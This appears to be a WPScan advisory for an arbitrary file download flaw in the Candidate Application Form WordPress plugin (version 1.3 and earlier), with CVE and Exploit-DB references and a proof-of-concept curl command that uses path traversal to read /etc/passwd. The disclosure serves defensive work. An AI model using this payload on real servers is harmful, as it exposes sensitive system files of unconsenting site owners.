Candidate Application Form <= 1.3 - Arbitrary File Download



Description
Plugin is still affected and has been closed.

The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

Affects Plugin

References

CVE 2015-1000005
EXPLOITDB 37754
PACKETSTORM 132960
URL https://vapid.dhs.org/advisory.php?v=142

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Original Researcher Larry W. Cashdollar
Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 5957
Verified Yes
WPVDB ID 8099

Timeline

Publicly Published 2015-07-12 (over 4 years ago)
Added 2015-07-14 (over 4 years ago)
Last Updated 2019-11-28 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin